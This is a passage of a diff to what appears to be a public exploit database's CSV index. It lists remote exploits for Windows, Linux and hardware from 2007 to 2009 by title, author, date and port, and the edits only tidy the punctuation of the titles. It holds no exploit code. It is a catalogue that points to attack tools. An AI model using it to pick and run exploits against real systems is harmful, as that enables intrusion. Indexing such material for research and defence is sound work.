WebServer) Disclosure",2007-12-18,NeoCoderz,hardware,remote,0 +4744,platforms/hardware/remote/4744.txt,"rooter VDSL Device - Goahead WebServer Disclosure",2007-12-18,NeoCoderz,hardware,remote,0 4745,platforms/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)",2007-12-18,axis,windows,remote,0 4746,platforms/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control Remote Buffer Overflow",2007-12-18,shinnai,windows,remote,0 -4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - (ulang) Remote Command Execution",2007-12-18,rgod,windows,remote,0 +4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - 'ulang' Remote Command Execution",2007-12-18,rgod,windows,remote,0 4754,platforms/win_x86/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - 'logurl()' Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",win_x86,remote,3128 4760,platforms/windows/remote/4760.txt,"Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0 4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Command Execution",2007-12-21,eliteboy,multiple,remote,25 @@ -10253,13 +10258,13 @@ id,file,description,date,author,platform,type,port 5536,platforms/windows/remote/5536.php,"HLDS WebMod 0.48 - 'rconpass' Remote Heap Overflow",2008-05-03,SkOd,windows,remote,0 5563,platforms/windows/remote/5563.pl,"TFTP Server for Windows 1.4 - ST Remote BSS Overflow",2008-05-08,tixxDZ,windows,remote,69 5612,platforms/windows/remote/5612.html,"idautomation bar code - ActiveX Multiple Vulnerabilities",2008-05-14,shinnai,windows,remote,0 -5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer - (Print Table of Links) Cross-Zone Scripting (PoC)",2008-05-14,"Aviv Raff",windows,remote,0 -5622,platforms/linux/remote/5622.txt,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - (Predictable PRNG) Brute Force SSH (Perl)",2008-05-15,"Markus Mueller",linux,remote,22 -5632,platforms/linux/remote/5632.rb,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - (Predictable PRNG) Brute Force SSH (Ruby)",2008-05-16,L4teral,linux,remote,22 +5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer - Print Table of Links Cross-Zone Scripting (PoC)",2008-05-14,"Aviv Raff",windows,remote,0 +5622,platforms/linux/remote/5622.txt,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Perl)",2008-05-15,"Markus Mueller",linux,remote,22 +5632,platforms/linux/remote/5632.rb,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby)",2008-05-16,L4teral,linux,remote,22 5681,platforms/windows/remote/5681.html,"Creative Software AutoUpdate Engine - ActiveX Stack Overflow",2008-05-27,BitKrush,windows,remote,0 5694,platforms/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow",2008-05-29,Heretic2,windows,remote,623 5695,platforms/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow",2008-05-29,Heretic2,windows,remote,8800 -5720,platforms/linux/remote/5720.py,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - (Predictable PRNG) Brute Force SSH (Python)",2008-06-01,"WarCat team",linux,remote,22 +5720,platforms/linux/remote/5720.py,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Python)",2008-06-01,"WarCat team",linux,remote,22 5732,platforms/windows/remote/5732.html,"C6 Messenger - ActiveX Remote Download and Execute Exploit",2008-06-03,Nine:Situations:Group,windows,remote,0 5738,platforms/windows/remote/5738.rb,"HP StorageWorks - NSI Double Take Remote Overflow (Metasploit)",2008-06-04,ri0t,windows,remote,1100 5741,platforms/windows/remote/5741.html,"Akamai Download Manager < 2.2.3.7 - ActiveX Remote Download Exploit",2008-06-04,cocoruder,windows,remote,0 @@ -10283,8 +10288,8 @@ id,file,description,date,author,platform,type,port 6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Escalation",2008-07-17,eliteboy,linux,remote,0 6100,platforms/win_x86/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,win_x86,remote,80 6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow",2008-07-22,"Guido Landi",windows,remote,0 -6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - (server header) Remote Code Execution",2008-07-22,Koshi,windows,remote,0 -6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (C)",2008-07-23,r0ut3r,windows,remote,0 +6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - server header Remote Code Execution",2008-07-22,Koshi,windows,remote,0 +6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (C)",2008-07-23,r0ut3r,windows,remote,0 6122,platforms/multiple/remote/6122.rb,"BIND 9.4.1 < 9.4.2 - Remote DNS Cache Poisoning Exploit (Metasploit)",2008-07-23,I)ruid,multiple,remote,0 6123,platforms/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning Exploit (Python)",2008-07-24,"Julien Desfossez",multiple,remote,0 6124,platforms/windows/remote/6124.c,"Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote Exploit",2008-07-24,callAX,windows,remote,0 @@ -10293,7 +10298,7 @@ id,file,description,date,author,platform,type,port 6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan - ObjRemoveCtrl ActiveX Control Buffer Overflow",2008-07-28,Elazar,windows,remote,0 6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) - FTP Server Remote Exploit (Attached to GDB)",2008-07-29,"Andy Davis",hardware,remote,0 6175,platforms/windows/remote/6175.html,"NCTsoft - 'AudFile.dll' ActiveX Control Remote Buffer Overflow",2008-07-31,shinnai,windows,remote,0 -6195,platforms/windows/remote/6195.c,"IntelliTamper 2.07 - (imgsrc) Remote Buffer Overflow",2008-08-03,r0ut3r,windows,remote,0 +6195,platforms/windows/remote/6195.c,"IntelliTamper 2.07 - 'imgsrc' Remote Buffer Overflow",2008-08-03,r0ut3r,windows,remote,0 6217,platforms/windows/remote/6217.pl,"BlazeDVD 5.0 - PLF Playlist File Remote Buffer Overflow",2008-08-10,LiquidWorm,windows,remote,0 6220,platforms/windows/remote/6220.html,"Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX Remote Buffer Overflow",2008-08-10,"Guido Landi",windows,remote,0 6227,platforms/windows/remote/6227.c,"IntelliTamper 2.07 - HTTP Header Remote Code Execution",2008-08-10,"Wojciech Pawlikowski",windows,remote,0 @@ -10313,7 +10318,7 @@ id,file,description,date,author,platform,type,port 6334,platforms/windows/remote/6334.html,"Friendly Technologies - Read/Write Registry/Read Files Exploit",2008-08-30,spdr,windows,remote,0 6355,platforms/windows/remote/6355.txt,"Google Chrome 0.2.149.27 - Automatic File Download Exploit",2008-09-03,nerex,windows,remote,0 6366,platforms/hardware/remote/6366.c,"MicroTik RouterOS 3.13 - SNMP write (Set request) (PoC)",2008-09-05,ShadOS,hardware,remote,0 -6367,platforms/windows/remote/6367.txt,"Google Chrome 0.2.149.27 - (SaveAs) Remote Buffer Overflow",2008-09-05,SVRT,windows,remote,0 +6367,platforms/windows/remote/6367.txt,"Google Chrome 0.2.149.27 - 'SaveAs' Remote Buffer Overflow",2008-09-05,SVRT,windows,remote,0 6387,platforms/windows/remote/6387.rb,"CitectSCADA ODBC Server - Remote Stack Buffer Overflow (Metasploit)",2008-09-05,"Kevin Finisterre",windows,remote,2022 6407,platforms/windows/remote/6407.c,"Microworld Mailscan 5.6.a - Password Reveal Exploit",2008-09-09,SlaYeR,windows,remote,0 6414,platforms/windows/remote/6414.html,"Peachtree Accounting 2004 - 'PAWWeb11.ocx' ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote,0 @@ -10342,7 +10347,7 @@ id,file,description,date,author,platform,type,port 6786,platforms/solaris/remote/6786.pl,"Solaris 9 (UltraSPARC) - 'sadmind' Remote Code Execution",2008-10-19,kingcope,solaris,remote,111 6793,platforms/windows/remote/6793.html,"Dart Communications PowerTCP FTP module - Remote Buffer Overflow",2008-10-20,InTeL,windows,remote,0 6801,platforms/windows/remote/6801.txt,"Opera 9.60 - Persistent Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote,0 -6804,platforms/windows/remote/6804.pl,"GoodTech SSH - (SSH_FXP_OPEN) Remote Buffer Overflow",2008-10-22,r0ut3r,windows,remote,22 +6804,platforms/windows/remote/6804.pl,"GoodTech SSH - 'SSH_FXP_OPEN' Remote Buffer Overflow",2008-10-22,r0ut3r,windows,remote,22 6813,platforms/windows/remote/6813.html,"Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution (PoC)",2008-10-23,"Aviv Raff",windows,remote,0 6828,platforms/windows/remote/6828.html,"db Software Laboratory VImpX - 'VImpX.ocx' Multiple Vulnerabilities",2008-10-24,shinnai,windows,remote,0 6840,platforms/windows/remote/6840.html,"PowerTCP FTP Module - Multiple Exploit Techniques (SEH HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0 @@ -10363,13 +10368,13 @@ id,file,description,date,author,platform,type,port 7125,platforms/windows/remote/7125.txt,"Microsoft Windows - SmbRelay3 NTLM Replay Exploit (MS08-068)",2008-11-14,"Andres Tarasco",windows,remote,0 7132,platforms/windows/remote/7132.py,"Microsoft Windows Server 2000/2003 - Code Execution (MS08-067)",2008-11-16,"Debasis Mohanty",windows,remote,445 7142,platforms/windows/remote/7142.html,"Chilkat Socket ActiveX 2.3.1.1 - Arbitrary File Creation",2008-11-17,Zigma,windows,remote,0 -7145,platforms/windows/remote/7145.txt,"Exodus 0.10 - (URI handler) Arbitrary Parameter Injection (1)",2008-11-17,Nine:Situations:Group,windows,remote,0 +7145,platforms/windows/remote/7145.txt,"Exodus 0.10 - URI Handler Arbitrary Parameter Injection (1)",2008-11-17,Nine:Situations:Group,windows,remote,0 7151,platforms/linux/remote/7151.c,"No-IP DUC 2.1.7 - Remote Code Execution",2008-11-18,XenoMuta,linux,remote,0 -7167,platforms/windows/remote/7167.html,"Exodus 0.10 - (URI handler) Arbitrary Parameter Injection (2)",2008-11-20,Nine:Situations:Group,windows,remote,0 -7181,platforms/windows/remote/7181.html,"KVIrc 3.4.2 Shiny - (URI handler) Remote Command Execution",2008-11-21,Nine:Situations:Group,windows,remote,0 +7167,platforms/windows/remote/7167.html,"Exodus 0.10 - URI Handler Arbitrary Parameter Injection (2)",2008-11-20,Nine:Situations:Group,windows,remote,0 +7181,platforms/windows/remote/7181.html,"KVIrc 3.4.2 Shiny - URI handler Remote Command Execution",2008-11-21,Nine:Situations:Group,windows,remote,0 7183,platforms/linux/remote/7183.txt,"verlihub 0.9.8d-RC2 - Remote Command Execution",2008-11-21,v4lkyrius,linux,remote,0 7196,platforms/windows/remote/7196.html,"Microsoft XML Core Services DTD - Cross-Domain Scripting (PoC) (MS08-069)",2008-11-23,"Jerome Athias",windows,remote,0 -7355,platforms/windows/remote/7355.txt,"NULL FTP Server 1.1.0.7 - Site Parameters Command Injection",2008-12-05,"Tan Chew Keong",windows,remote,0 +7355,platforms/windows/remote/7355.txt,"NULL FTP Server 1.1.0.7 - 'Site' Command Injection",2008-12-05,"Tan Chew Keong",windows,remote,0 7384,platforms/windows/remote/7384.txt,"XAMPP 1.6.8 - Cross-Site Request Forgery (Change Administrative Password)",2008-12-08,"Michael Brooks",windows,remote,0 7389,platforms/hardware/remote/7389.htm,"DD-WRT v24-sp1 - Cross-Site Reference Forgery",2008-12-08,"Michael Brooks",hardware,remote,0 7402,platforms/windows/remote/7402.html,"EasyMail - ActiveX 'emmailstore.dll 6.5.0.3' Buffer Overflow",2008-12-09,e.wiZz!,windows,remote,0 @@ -10377,11 +10382,11 @@ id,file,description,date,author,platform,type,port 7410,platforms/windows/remote/7410.htm,"Microsoft Internet Explorer (Windows Vista) - XML Parsing Buffer Overflow",2008-12-10,muts,windows,remote,0 7442,platforms/windows/remote/7442.txt,"TmaxSoft JEUS - Alternate Data Streams File Disclosure",2008-12-12,"Simon Ryeo",windows,remote,0 7452,platforms/windows/remote/7452.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Universal Remote Buffer Overflow",2008-12-14,SkD,windows,remote,69 -7477,platforms/windows/remote/7477.html,"Microsoft Internet Explorer - XML Parsing Buffer Overflow (All-in-One)",2008-12-15,krafty,windows,remote,0 +7477,platforms/windows/remote/7477.html,"Microsoft Internet Explorer - XML Parsing Buffer Overflow",2008-12-15,krafty,windows,remote,0 7496,platforms/hardware/remote/7496.txt,"Barracuda Spam Firewall 3.5.11.020 Model 600 - SQL Injection",2008-12-16,"Marian Ventuneac",hardware,remote,0 7505,platforms/windows/remote/7505.html,"Phoenician Casino FlashAX - ActiveX Remote Code Execution",2008-12-17,e.wiZz!,windows,remote,0 7521,platforms/windows/remote/7521.txt,"WebcamXP 5.3.2.375 - Remote File Disclosure",2008-12-19,nicx0,windows,remote,0 -7566,platforms/windows/remote/7566.html,"Google Chrome - (ChromeHTML://) Remote Parameter Injection",2008-12-23,Nine:Situations:Group,windows,remote,0 +7566,platforms/windows/remote/7566.html,"Google Chrome - 'ChromeHTML://' Remote Parameter Injection",2008-12-23,Nine:Situations:Group,windows,remote,0 7583,platforms/windows/remote/7583.pl,"Microsoft Internet Explorer - XML Parsing Buffer Overflow",2008-12-28,"Jeremy Brown",windows,remote,0 7584,platforms/windows/remote/7584.pl,"Amaya Web Browser 11.0.1 (Windows Vista) - Remote Buffer Overflow",2008-12-28,SkD,windows,remote,0 7594,platforms/windows/remote/7594.html,"Chilkat FTP - ActiveX (SaveLastError) Insecure Method Exploit",2008-12-28,callAX,windows,remote,0 @@ -10423,7 +10428,7 @@ id,file,description,date,author,platform,type,port 7921,platforms/hardware/remote/7921.txt,"Zoom VoIP Phone Adapater ATA1+1 1.2.5 - Cross-Site Request Forgery",2009-01-29,"Michael Brooks",hardware,remote,0 7926,platforms/windows/remote/7926.pl,"Amaya Web Editor 11 - Remote Overwrite (SEH)",2009-01-30,LiquidWorm,windows,remote,0 7928,platforms/windows/remote/7928.txt,"Synactis All_IN_THE_BOX ActiveX 3.0 - Null Byte File Overwrite",2009-01-30,DSecRG,windows,remote,0 -7935,platforms/windows/remote/7935.html,"Google Chrome 1.0.154.46 - (ChromeHTML://) Parameter Injection (PoC)",2009-01-30,waraxe,windows,remote,0 +7935,platforms/windows/remote/7935.html,"Google Chrome 1.0.154.46 - '(ChromeHTML://)' Injection (PoC)",2009-01-30,waraxe,windows,remote,0 7966,platforms/windows/remote/7966.txt,"NaviCOPA Web Server 3.0.1 - Buffer Overflow / Script Source Disclosure",2009-02-03,e.wiZz!,windows,remote,0 7988,platforms/windows/remote/7988.pl,"Amaya Web Browser 11 (Windows XP) - bdo tag Remote Stack Overflow",2009-02-04,"Rob Carter",windows,remote,0 7989,platforms/windows/remote/7989.pl,"Amaya Web Browser 11 (Windows Vista) - bdo tag Remote Stack Overflow",2009-02-04,"Rob Carter",windows,remote,0 @@ -10454,27 +10459,27 @@ id,file,description,date,author,platform,type,port 8206,platforms/windows/remote/8206.html,"GeoVision LiveAudio - ActiveX Remote Freed-Memory Access Exploit",2009-03-13,Nine:Situations:Group,windows,remote,0 8208,platforms/windows/remote/8208.html,"Morovia Barcode ActiveX 3.6.2 - 'MrvBarCd.dll' Insecure Method Exploit",2009-03-13,Cyber-Zone,windows,remote,0 8211,platforms/windows/remote/8211.pl,"RhinoSoft Serv-U FTP Server 7.4.0.1 - 'MKD' Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0 -8215,platforms/windows/remote/8215.txt,"PPLive 1.9.21 - (/LoadModule) URI Handlers Argument Injection",2009-03-16,Nine:Situations:Group,windows,remote,0 +8215,platforms/windows/remote/8215.txt,"PPLive 1.9.21 - '/LoadModule' URI Handlers Argument Injection",2009-03-16,Nine:Situations:Group,windows,remote,0 8227,platforms/windows/remote/8227.pl,"Talkative IRC 0.4.4.16 - Remote Stack Overflow (SEH)",2009-03-17,LiquidWorm,windows,remote,0 -8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 - (From) Remote Buffer Overflow (SEH)",2009-03-20,His0k4,windows,remote,0 +8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 - 'From' Remote Buffer Overflow (SEH)",2009-03-20,His0k4,windows,remote,0 8253,platforms/windows/remote/8253.c,"Racer 0.5.3 Beta 5 - Remote Stack Buffer Overflow",2009-03-20,"fl0 fl0w",windows,remote,0 8256,platforms/windows/remote/8256.c,"Sysax Multi Server 4.3 - Arbitrary Delete Files Exploit",2009-03-23,"Jonathan Salwan",windows,remote,0 8257,platforms/windows/remote/8257.txt,"Orbit Downloader 2.8.7 - Arbitrary File Deletion",2009-03-23,waraxe,windows,remote,0 8269,platforms/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities",2009-03-23,"Louhi Networks",hardware,remote,0 8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0 8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - Authenticated Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0 -8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - (Cross-Site Scripting) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0 +8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - Cross-Site Scripting Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0 8295,platforms/windows/remote/8295.pl,"freeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH)",2009-03-27,r0ut3r,windows,remote,22 8316,platforms/hardware/remote/8316.txt,"NOKIA Siemens FlexiISN 3.1 - Multiple Authentication Bypass Vulnerabilities",2009-03-30,TaMBaRuS,hardware,remote,0 8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow",2009-03-30,Encrypt3d.M!nd,windows,remote,0 8332,platforms/windows/remote/8332.txt,"PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite",2009-03-31,DSecRG,windows,remote,0 8336,platforms/windows/remote/8336.pl,"Oracle WebLogic IIS connector JSESSIONID - Remote Overflow",2009-04-01,"Guido Landi",windows,remote,0 8338,platforms/windows/remote/8338.py,"XBMC 8.10 (Windows) - GET Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 -8339,platforms/windows/remote/8339.py,"XBMC 8.10 - (takescreenshot) Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 -8340,platforms/windows/remote/8340.py,"XBMC 8.10 - (get tag from file name) Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 +8339,platforms/windows/remote/8339.py,"XBMC 8.10 - 'takescreenshot' Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 +8340,platforms/windows/remote/8340.py,"XBMC 8.10 - get tag from file name Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 8354,platforms/windows/remote/8354.py,"XBMC 8.10 - GET Remote Buffer Overflow (SEH) (Universal)",2009-04-06,n00b,windows,remote,80 8359,platforms/hardware/remote/8359.py,"Pirelli Discus DRG A225 wifi router - WPA2PSK Default Algorithm Exploit",2009-04-06,j0rgan,hardware,remote,0 -8363,platforms/windows/remote/8363.py,"XBMC 8.10 - (HEAD) Remote Buffer Overflow (SEH)",2009-04-07,His0k4,windows,remote,80 +8363,platforms/windows/remote/8363.py,"XBMC 8.10 - 'HEAD' Remote Buffer Overflow (SEH)",2009-04-07,His0k4,windows,remote,80 8368,platforms/windows/remote/8368.txt,"peterConnects Web Server - Traversal Arbitrary File Access",2009-04-08,"Bugs NotHugs",windows,remote,0 8384,platforms/linux/remote/8384.txt,"net2ftp 0.97 - Cross-Site Scripting / Request Forgery",2009-04-09,cicatriz,linux,remote,0 8392,platforms/windows/remote/8392.txt,"Chance-i DiViS DVR System Web-Server - Directory Traversal",2009-04-10,DSecRG,windows,remote,0 @@ -10523,12 +10528,12 @@ id,file,description,date,author,platform,type,port 8861,platforms/osx/remote/8861.rb,"Apple iTunes 8.1.1 - 'ITMS' Multiple Protocol Handler Buffer Overflow (Metasploit)",2009-06-03,"Will Drewry",osx,remote,0 8880,platforms/linux/remote/8880.txt,"kloxo 5.75 - Multiple Vulnerabilities",2009-06-04,anonymous,linux,remote,0 8897,platforms/windows/remote/8897.c,"httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0 -8907,platforms/multiple/remote/8907.txt,"Apple Safari 3.2.x - (XXE) Local File Theft",2009-06-09,"Chris Evans",multiple,remote,0 -8916,platforms/windows/remote/8916.py,"Free Download Manager 2.5/3.0 - (Control Server) Remote Buffer Overflow",2009-06-09,His0k4,windows,remote,80 +8907,platforms/multiple/remote/8907.txt,"Apple Safari 3.2.x - 'XXE' Local File Theft",2009-06-09,"Chris Evans",multiple,remote,0 +8916,platforms/windows/remote/8916.py,"Free Download Manager 2.5/3.0 - Control Server Remote Buffer Overflow",2009-06-09,His0k4,windows,remote,80 8922,platforms/windows/remote/8922.txt,"Worldweaver DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection",2009-06-10,"Core Security",windows,remote,0 8930,platforms/windows/remote/8930.txt,"ModSecurity 2.5.9 (Core Rules 2.5-1.6.1) - Filter Bypass",2009-06-11,"Lavakumar Kuppan",windows,remote,0 8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 (Windows) - 'itms/itcp' Remote Buffer Overflow",2009-06-12,ryujin,windows,remote,0 -8938,platforms/windows/remote/8938.txt,"Green Dam 3.17 (Windows XP SP2) - (URL) Remote Buffer Overflow",2009-06-12,seer[N.N.U],windows,remote,0 +8938,platforms/windows/remote/8938.txt,"Green Dam 3.17 (Windows XP SP2) - 'URL' Remote Buffer Overflow",2009-06-12,seer[N.N.U],windows,remote,0 8963,platforms/hardware/remote/8963.txt,"NETGEAR DG632 Router - Authentication Bypass",2009-06-15,"Tom Neaves",hardware,remote,0 8969,platforms/windows/remote/8969.rb,"Green Dam 3.17 - URL Processing Buffer Overflow (Metasploit)",2009-06-16,Trancer,windows,remote,0 8970,platforms/windows/remote/8970.txt,"McAfee 3.6.0.608 - 'naPolicyManager.dll' ActiveX Arbitrary Data Write",2009-06-16,callAX,windows,remote,0 @@ -10544,13 +10549,13 @@ id,file,description,date,author,platform,type,port 9108,platforms/windows/remote/9108.py,"Microsoft Internet Explorer 7 Video - ActiveX Remote Buffer Overflow",2009-07-10,"David Kennedy (ReL1K)",windows,remote,0 9117,platforms/hardware/remote/9117.txt,"HTC / Windows Mobile OBEX FTP Service - Directory Traversal",2009-07-10,"Alberto Tablado",hardware,remote,0 9128,platforms/windows/remote/9128.py,"Pirch IRC 98 Client - 'Response' Remote Buffer Overflow (SEH)",2009-07-12,His0k4,windows,remote,0 -9137,platforms/windows/remote/9137.html,"Mozilla Firefox 3.5 - (Font tags) Remote Buffer Overflow",2009-07-13,Sberry,windows,remote,0 +9137,platforms/windows/remote/9137.html,"Mozilla Firefox 3.5 - Font tags Remote Buffer Overflow",2009-07-13,Sberry,windows,remote,0 9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 - Local/Remote Multiple Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0 9181,platforms/windows/remote/9181.py,"Mozilla Firefox 3.5 - 'Font tags' Remote Heap Spray (1)",2009-07-17,"David Kennedy (ReL1K)",windows,remote,0 9209,platforms/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,hardware,remote,0 9214,platforms/windows/remote/9214.pl,"Mozilla Firefox 3.5 - 'Font tags' Remote Heap Spray (2)",2009-07-20,netsoul,windows,remote,0 9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet - ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0 -9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (OSX) - (Font tags) Remote Buffer Overflow",2009-07-24,Dr_IDE,osx,remote,0 +9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (OSX) - Font Tags Remote Buffer Overflow",2009-07-24,Dr_IDE,osx,remote,0 9278,platforms/freebsd/remote/9278.txt,"NcFTPd 2.8.5 - Remote Jail Breakout",2009-07-27,kingcope,freebsd,remote,0 9303,platforms/windows/remote/9303.c,"VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Buffer Overflow",2009-07-30,"Pankaj Kohli",windows,remote,0 9318,platforms/windows/remote/9318.py,"VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Buffer Overflow (Universal)",2009-07-31,His0k4,windows,remote,0 @@ -10558,14 +10563,14 @@ id,file,description,date,author,platform,type,port 9330,platforms/windows/remote/9330.py,"Amaya 11.2 - W3C Editor/Browser (defer) Remote Buffer Overflow (SEH)",2009-08-03,His0k4,windows,remote,0 9422,platforms/hardware/remote/9422.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (1)",2009-08-12,hkm,hardware,remote,0 9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 - 'user.ini' Arbitrary Download",2009-08-13,"aBo MoHaMeD",hardware,remote,0 -9443,platforms/windows/remote/9443.txt,"Adobe JRun 4 - (logfile) Authenticated Directory Traversal",2009-08-18,DSecRG,windows,remote,0 +9443,platforms/windows/remote/9443.txt,"Adobe JRun 4 - 'logfile' Authenticated Directory Traversal",2009-08-18,DSecRG,windows,remote,0 9456,platforms/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Add Admin",2009-08-18,SuNHouSe2,hardware,remote,0 9468,platforms/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)",2009-08-18,Wraith,windows,remote,69 9473,platforms/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Configuration Access",2009-08-18,SuNHouSe2,hardware,remote,0 9498,platforms/hardware/remote/9498.txt,"NETGEAR WNR2000 FW 1.2.0.8 - Information Disclosure",2009-08-24,"Jean Trolleur",hardware,remote,0 9500,platforms/windows/remote/9500.cpp,"NaviCOPA Web Server 3.01 - Remote Buffer Overflow",2009-08-24,SimO-s0fT,windows,remote,0 9503,platforms/hardware/remote/9503.txt,"Huawei SmartAX MT880 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-08-24,"Jerome Athias",hardware,remote,0 -9508,platforms/windows/remote/9508.rb,"ProFTP 2.9 - (welcome message) Remote Buffer Overflow (Metasploit)",2009-08-25,His0k4,windows,remote,0 +9508,platforms/windows/remote/9508.rb,"ProFTP 2.9 - Welcome Message Remote Buffer Overflow (Metasploit)",2009-08-25,His0k4,windows,remote,0 9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow",2009-08-31,kingcope,windows,remote,21 9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow",2009-09-01,muts,windows,remote,21 9586,platforms/windows/remote/9586.py,"SIDVault 2.0e - Windows Remote Buffer Overflow",2009-09-03,blake,windows,remote,389 @@ -10589,7 +10594,7 @@ id,file,description,date,author,platform,type,port 9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Universal Remote Buffer Overflow (SEH)",2009-09-15,hack4love,windows,remote,6660 9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 - Source Code Disclosure",2009-09-16,Dr_IDE,windows,remote,0 9704,platforms/windows/remote/9704.html,"Quiksoft EasyMail 6.0.3.0 - IMAP 'connect()' ActiveX Buffer Overflow",2009-09-17,"Sebastian Wolfgarten",windows,remote,0 -9705,platforms/windows/remote/9705.html,"Quiksoft EasyMail 6 - (AddAttachment) Remote Buffer Overflow",2009-09-17,bmgsec,windows,remote,0 +9705,platforms/windows/remote/9705.html,"Quiksoft EasyMail 6 - 'AddAttachment' Remote Buffer Overflow",2009-09-17,bmgsec,windows,remote,0 9718,platforms/multiple/remote/9718.txt,"Xerver HTTP Server 4.32 - Cross-Site Scripting / Directory Traversal",2009-09-18,Stack,multiple,remote,0 9800,platforms/windows/remote/9800.cpp,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (2)",2009-11-05,"Megumi Yanagishita",windows,remote,80 9802,platforms/windows/remote/9802.html,"IBM Installation Manager 1.3.0 - 'iim://' URI handler Exploit",2009-09-29,bruiser,windows,remote,0 @@ -10713,7 +10718,7 @@ id,file,description,date,author,platform,type,port 10510,platforms/hardware/remote/10510.txt,"Cisco ASA 8.x - VPN SSL Module Clientless URL-list control Bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote,0 10542,platforms/windows/remote/10542.py,"TFTP Server 1.4 - Remote Buffer Overflow (2)",2009-12-18,Molotov,windows,remote,69 10579,platforms/multiple/remote/10579.py,"TLS - Renegotiation (PoC)",2009-12-21,"RedTeam Pentesting",multiple,remote,0 -10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - 